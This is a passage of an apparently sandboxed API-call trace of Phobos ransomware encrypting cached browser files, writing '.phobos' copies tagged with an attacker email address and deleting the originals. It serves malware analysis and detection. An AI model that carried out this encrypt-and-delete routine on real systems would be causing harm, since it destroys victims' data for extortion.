halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\memmdl2.2.17[1].eot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.470] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.470] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MemMDL2.2.17[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\memmdl2.2.17[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0190.471] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0190.471] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.471] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a114, lpOverlapped=0x0) returned 1 [0190.485] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a120, dwBufLen=0x1a120 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a120) returned 1 [0190.486] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a120, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a120, lpOverlapped=0x0) returned 1 [0190.488] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0190.488] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.488] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0190.488] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.489] WriteFile (in: hFile=0x164, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0190.489] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.489] CloseHandle (hObject=0x178) returned 1 [0190.489] CloseHandle (hObject=0x164) returned 1 [0190.489] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\IKQEEPZR\\MemMDL2.2.17[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\ikqeepzr\\memmdl2.2.17[1].eot")) returned 1 [0190.490] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\cb=gapi[1].loaded_1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.493] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=74370) returned 1 [0190.493] CloseHandle (hObject=0x178) returned 1 [0190.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\cb=gapi[1].loaded_1")) returned 0x2020 [0190.494] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\cb=gapi[1].loaded_1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\cb=gapi[1].loaded_1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.494] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.494] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.494] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\cb=gapi[1].loaded_1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.495] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0190.495] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.495] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x12282, lpOverlapped=0x0) returned 1 [0190.538] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x12290, dwBufLen=0x12290 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x12290) returned 1 [0190.538] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x12290, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x12290, lpOverlapped=0x0) returned 1 [0190.542] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32de8) returned 1 [0190.542] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.542] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0190.542] CryptDestroyKey (hKey=0xa32de8) returned 1 [0190.542] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0190.543] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.543] CloseHandle (hObject=0x178) returned 1 [0190.543] CloseHandle (hObject=0x194) returned 1 [0190.543] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\cb=gapi[1].loaded_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\cb=gapi[1].loaded_1")) returned 1 [0190.544] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1]"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.545] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2243) returned 1 [0190.545] CloseHandle (hObject=0x194) returned 1 [0190.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1]")) returned 0x2020 [0190.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.545] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.545] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.545] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1].id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1].id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.546] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0190.546] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.546] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x8c3, lpOverlapped=0x0) returned 1 [0190.652] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8d0, dwBufLen=0x8d0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8d0) returned 1 [0190.652] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8d0, lpOverlapped=0x0) returned 1 [0190.653] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa327e8) returned 1 [0190.653] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.653] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150, dwBufLen=0x150 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x150) returned 1 [0190.653] CryptDestroyKey (hKey=0xa327e8) returned 1 [0190.653] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x202, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x202, lpOverlapped=0x0) returned 1 [0190.654] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.654] CloseHandle (hObject=0x194) returned 1 [0190.654] CloseHandle (hObject=0x178) returned 1 [0190.654] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\getype=homepage;kvpg=msn%2Fde-de;kvugc=0;kvmn=MSNDEDE1C;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\getype=homepage;kvpg=msn%2fde-de;kvugc=0;kvmn=msndede1c;kvgrp=627518548;kvismob=2;extmirroring=0;kvtile=4;target=_blank;aduho=600;grp=627518548[1]")) returned 1 [0190.655] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.655] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[1].eot"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.663] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=29012) returned 1 [0190.663] CloseHandle (hObject=0x178) returned 1 [0190.663] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[1].eot")) returned 0x2020 [0190.663] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[1].eot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.663] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.663] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[1].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[1].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.664] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0190.664] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.664] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7154, lpOverlapped=0x0) returned 1 [0190.758] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7160, dwBufLen=0x7160 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x7160) returned 1 [0190.758] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x7160, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x7160, lpOverlapped=0x0) returned 1 [0190.760] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ae8) returned 1 [0190.760] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.760] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0190.760] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0190.760] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0190.760] CryptDestroyKey (hKey=0xa32a28) returned 1 [0190.760] CloseHandle (hObject=0x178) returned 1 [0190.760] CloseHandle (hObject=0x194) returned 1 [0190.760] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[1].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[1].eot")) returned 1 [0190.761] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0190.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[3].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[3].eot"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.762] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=30643) returned 1 [0190.762] CloseHandle (hObject=0x194) returned 1 [0190.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[3].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[3].eot")) returned 0x2020 [0190.762] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[3].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[3].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0190.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[3].eot" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[3].eot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0190.763] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.763] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0190.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\latest[3].eot.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\yg1r61z8\\latest[3].eot.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0190.764] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0190.764] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0190.764] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: 